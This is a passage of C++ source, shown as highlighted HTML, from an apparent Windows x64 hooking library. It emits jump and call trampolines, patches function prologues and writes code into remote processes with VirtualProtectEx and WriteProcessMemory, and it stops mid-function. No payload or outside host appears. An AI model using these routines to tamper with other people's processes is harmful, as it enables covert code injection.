<span class="kt">uint32_t</span> <span class="nf">WriteMovToRCX</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">val</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">()));</span>
<span class="kt">uint8_t</span> <span class="n">movAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into rcx</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">movAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">val</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">movAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">movAsmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">movAsmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteSaveArgumentRegisters</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">asmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x51</span><span class="p">,</span> <span class="c1">//push rcx</span>
<span class="mh">0x52</span><span class="p">,</span> <span class="c1">//push rdx</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="c1">//push r8</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x51</span><span class="p">,</span> <span class="c1">//push r9</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0xEC</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="c1">//sub rsp, 64 -> space for xmm registers</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="c1">// movups xmmword ptr [rsp],xmm0</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x4C</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="c1">//movups xmmword ptr [rsp+10h],xmm1</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="c1">//movups xmmword ptr [rsp+20h],xmm2</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x5C</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x30</span> <span class="c1">//movups xmmword ptr [rsp+30h],xmm3</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">asmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">asmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">asmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteRestoreArgumentRegisters</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">asmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="c1">//movups xmm0,xmmword ptr[rsp]</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x4C</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span><span class="c1">//movups xmm1,xmmword ptr[rsp + 10h]</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span><span class="c1">//movups xmm2,xmmword ptr[rsp + 20h]</span>
<span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x5C</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span><span class="c1">//movups xmm3,xmmword ptr[rsp + 30h]</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0xC4</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span><span class="c1">//add rsp,40h</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x59</span><span class="p">,</span><span class="c1">//pop r9</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x58</span><span class="p">,</span><span class="c1">//pop r8</span>
<span class="mh">0x5A</span><span class="p">,</span><span class="c1">//pop rdx</span>
<span class="mh">0x59</span> <span class="c1">//pop rcx</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">asmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">asmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">asmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteAddRSP32</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">addAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0xC4</span><span class="p">,</span> <span class="mh">0x20</span> <span class="c1">//add rsp,20h (32 bytes)</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">addAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addAsmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addAsmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteSubRSP32</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">subAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0xEC</span><span class="p">,</span> <span class="mh">0x20</span> <span class="c1">//sub rsp,20h (32 bytes)</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">subAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">subAsmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">subAsmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteAbsoluteCall64</span><span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">funcToCall</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">()));</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">funcToCall</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">()));</span>
<span class="c1">//writes an absolute jump (mov r10, addr; jmp r10) into the memory allocated near the hooked function</span>
<span class="c1">//the 5 byte E9 relative jump installed in the hooked function lands here</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//mov 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span> <span class="c1">//jmp r10</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">process</span><span class="p">));</span>
<span class="c1">//writes an absolute jump (mov r10, addr; jmp r10) into memory allocated near the hooked function in the remote process</span>
<span class="c1">//the 5 byte E9 relative jump installed in the hooked function lands here</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//mov 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span> <span class="c1">//jmp r10</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
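<span class="kt">bool</span> <span class="n">success</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">),</span> <span class="nb">nullptr</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">success</span><span class="p">);</span> <span class="c1">//don't report bytes written if the remote write failed</span>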
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteRelativeJump</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">jumpTarget</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="kt">int64_t</span> <span class="n">relativeToJumpTarget64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">jumpTarget</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
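<span class="n">check</span><span class="p">(</span><span class="n">relativeToJumpTarget64</span> <span class="o">>=</span> <span class="n">INT32_MIN</span> <span class="o">&&</span> <span class="n">relativeToJumpTarget64</span> <span class="o"><=</span> <span class="n">INT32_MAX</span><span class="p">);</span> <span class="c1">//rel32 must fit in 32 bits in both directions</span>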
<span class="kt">int32_t</span> <span class="n">relativeToJumpTarget</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relativeToJumpTarget64</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relativeToJumpTarget</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">success</span> <span class="o">=</span> <span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">success</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteRelativeJump</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">jumpTarget</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">numTrailingNOPs</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="kt">int64_t</span> <span class="n">relativeToJumpTarget64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">jumpTarget</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
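<span class="n">check</span><span class="p">(</span><span class="n">relativeToJumpTarget64</span> <span class="o">>=</span> <span class="n">INT32_MIN</span> <span class="o">&&</span> <span class="n">relativeToJumpTarget64</span> <span class="o"><=</span> <span class="n">INT32_MAX</span><span class="p">);</span> <span class="c1">//rel32 must fit in 32 bits in both directions</span>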
<span class="kt">int32_t</span> <span class="n">relativeToJumpTarget</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relativeToJumpTarget64</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relativeToJumpTarget</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">success</span> <span class="o">=</span> <span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">success</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">byteFunc2Hook</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numTrailingNOPs</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">memset</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)(</span><span class="n">byteFunc2Hook</span> <span class="o">+</span> <span class="mi">5</span> <span class="o">+</span> <span class="n">i</span><span class="p">),</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">)</span> <span class="o">+</span> <span class="n">numTrailingNOPs</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteRelativeJump</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">jumpTarget</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="kt">int64_t</span> <span class="n">relativeToJumpTarget64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">jumpTarget</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
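<span class="n">check</span><span class="p">(</span><span class="n">relativeToJumpTarget64</span> <span class="o">>=</span> <span class="n">INT32_MIN</span> <span class="o">&&</span> <span class="n">relativeToJumpTarget64</span> <span class="o"><=</span> <span class="n">INT32_MAX</span><span class="p">);</span> <span class="c1">//rel32 must fit in 32 bits in both directions</span>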
<span class="kt">int32_t</span> <span class="n">relativeToJumpTarget</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relativeToJumpTarget64</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relativeToJumpTarget</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">success</span> <span class="o">=</span> <span class="n">VirtualProtectEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">success</span><span class="p">);</span>
<span class="n">success</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">),</span> <span class="nb">nullptr</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">success</span><span class="p">);</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">HMODULE</span> <span class="nf">FindModuleBaseAddress</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">targetModule</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">hMods</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">cbNeeded</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">hMods</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">hMods</span><span class="p">),</span> <span class="o">&</span><span class="n">cbNeeded</span><span class="p">))</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="p">(</span><span class="n">cbNeeded</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">));</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">moduleName</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">];</span>
<span class="c1">// Get the full path to the module's file (ANSI variant, so the buffer matches strstr below).</span>
<span class="k">if</span> <span class="p">(</span><span class="n">GetModuleFileNameExA</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">hMods</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span>
<span class="k">sizeof</span><span class="p">(</span><span class="n">moduleName</span><span class="p">)))</span>
<span class="p">{</span>
<span class="c1">// Return this module's handle if its path contains the target module name.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strstr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="n">targetModule</span><span class="p">)</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">hMods</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">FindAddressOfRemoteDLLFunction</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">dllName</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">funcName</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//first, load the dll into this process so we can use GetProcAddress to determine the offset</span>
<span class="c1">//of the target function from the DLL base address</span>
<span class="n">HMODULE</span> <span class="n">localDLL</span> <span class="o">=</span> <span class="n">LoadLibraryEx</span><span class="p">(</span><span class="n">dllName</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">localDLL</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">localHookFunc</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">localDLL</span><span class="p">,</span> <span class="n">funcName</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">localHookFunc</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">offsetOfHookFunc</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">localHookFunc</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">localDLL</span><span class="p">;</span>
<span class="n">FreeLibrary</span><span class="p">(</span><span class="n">localDLL</span><span class="p">);</span> <span class="c1">//free the library, we don't need it anymore.</span>
<span class="c1">//Technically, we could just use the result of GetProcAddress, since Windows usually maps a given dll at the</span>
<span class="c1">//same base address in every process (ASLR typically picks that address once per boot), but just in case the</span>
<span class="c1">//remote process has relocated the dll, I'm getting the remote base address here separately.</span>
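<span class="n">HMODULE</span> <span class="n">remoteModuleBase</span> <span class="o">=</span> <span class="n">FindModuleBaseAddress</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">dllName</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">remoteModuleBase</span><span class="p">);</span> <span class="c1">//FindModuleBaseAddress returns NULL if the dll isn't loaded in the remote process</span>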
<span class="k">return</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">remoteModuleBase</span> <span class="o">+</span> <span class="n">offsetOfHookFunc</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">SetOtherThreadsSuspended</span><span class="p">(</span><span class="kt">bool</span> <span class="n">suspend</span><span class="p">)</span>
<span class="p">{</span>
